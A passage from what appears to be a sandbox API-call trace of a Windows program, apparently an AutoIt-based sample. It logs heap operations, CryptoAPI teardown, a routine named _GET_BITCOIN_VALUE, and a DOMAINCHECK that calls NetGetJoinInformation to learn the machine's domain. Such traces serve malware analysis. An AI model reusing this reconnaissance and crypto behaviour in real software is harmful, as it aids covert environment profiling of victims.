hHash=0x0, Final=1, dwFlags=0x0, pbData=0xaa9328*, pdwDataLen=0x6ae928*=0x0, dwBufLen=0x10 | out: pbData=0xaa9328*, pdwDataLen=0x6ae928*=0x10) returned 1 [0045.648] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c24c0 | out: hHeap=0x770000) returned 1 [0045.648] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2e58 | out: hHeap=0x770000) returned 1 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc18 | out: hHeap=0x770000) returned 1 [0045.648] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.648] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc18 | out: hHeap=0x770000) returned 1 [0045.648] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0045.648] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aba40 | out: hHeap=0x770000) returned 1 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b620 | out: hHeap=0x770000) returned 1 [0045.648] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0045.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afbe8 | out: hHeap=0x770000) returned 1 [0045.649] PeekMessageW (in: lpMsg=0x6ae8cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8cc) returned 0 [0045.649] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2480 | out: hHeap=0x770000) returned 1 [0045.649] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b638 | out: hHeap=0x770000) returned 1 [0045.649] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.649] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.649] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2480 | out: hHeap=0x770000) returned 1 [0045.649] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.650] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.650] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.650] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0045.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.650] PeekMessageW (in: lpMsg=0x6af154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af154) returned 0 [0045.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0045.650] PeekMessageW (in: lpMsg=0x6aeb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb04) returned 0 [0045.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.650] CryptDestroyKey (hKey=0x7c2440) returned 1 [0045.650] PeekMessageW (in: lpMsg=0x6af154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af154) returned 0 [0045.650] PeekMessageW (in: lpMsg=0x6af154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af154) returned 0 [0045.650] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0045.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2de0 | out: hHeap=0x770000) returned 1 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc38 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6aeefc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeefc) returned 0 [0045.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc38 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6aeca4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeca4) returned 0 [0045.651] PeekMessageW (in: lpMsg=0x6aeca4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeca4) returned 0 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aba40 | out: hHeap=0x770000) returned 1 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88baa0 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6aeefc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeefc) returned 0 [0045.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6aeadc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeadc) returned 0 [0045.651] PeekMessageW (in: lpMsg=0x6aeefc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeefc) returned 0 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2440 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6aeefc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeefc) returned 0 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88bb00 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6af154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af154) returned 0 [0045.651] PeekMessageW (in: lpMsg=0x6af154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af154) returned 0 [0045.651] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.651] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2d90 | out: hHeap=0x770000) returned 1 [0045.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.651] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.652] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.652] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0045.652] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd58 | out: hHeap=0x770000) returned 1 [0045.652] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0045.652] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd58 | out: hHeap=0x770000) returned 1 [0045.652] PeekMessageW (in: lpMsg=0x6aedec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedec) returned 0 [0045.652] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2e08 | out: hHeap=0x770000) returned 1 [0045.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd58 | out: hHeap=0x770000) returned 1 [0045.652] PeekMessageW (in: lpMsg=0x6aedec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedec) returned 0 [0045.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.653] CryptReleaseContext (hProv=0x7d56f0, dwFlags=0x0) returned 1 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcd8 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7f30 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ba70 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b7e8 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba40 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b6f8 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd58 [0045.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b6f8 | out: hHeap=0x770000) returned 1 [0045.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd58 | out: hHeap=0x770000) returned 1 [0045.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ba40 | out: hHeap=0x770000) returned 1 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba40 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b6f8 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb00 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd58 [0045.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88bb00 | out: hHeap=0x770000) returned 1 [0045.653] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2d90 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba70 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0xaa1b30 [0045.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.653] PeekMessageW (in: lpMsg=0x6aedec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedec) returned 0 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afad8 [0045.653] FreeLibrary (hLibModule=0x754b0000) returned 1 [0045.653] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.654] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.654] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afad8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.654] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afad8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.654] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcf8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2d90 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdd8 [0045.654] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b30 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889418 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2b8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895f8 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af548 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d48 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af448 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4558 [0045.654] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0045.654] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0045.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af548 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af518 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0045.655] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0045.655] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af518 [0045.655] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2a98 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a48 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af308 [0045.655] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af418 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af458 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0045.655] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0045.655] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c48 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892e0 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2d8 [0045.655] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bab8 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4d8 [0045.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0045.655] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74160000 [0045.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b860 [0045.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0045.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16) returned 0xaa9308 [0045.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0xaa9308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0045.664] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x6ae2e8, BufferType=0x6ae300 | out: lpNameBuffer=0x6ae2e8*="WORKGROUP", BufferType=0x6ae300) returned 0x0 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe98 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7f30 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b920 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb30 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0045.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af488 [0045.666] FreeLibrary (hLibModule=0x74160000) returned 1 [0045.668] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2d8 [0045.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b7d08 [0045.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af428 [0045.668] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0bd0 [0045.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889478 [0045.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2d8 [0045.669] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0cc0 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba40 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af428 [0045.669] RtlAllocateHeap 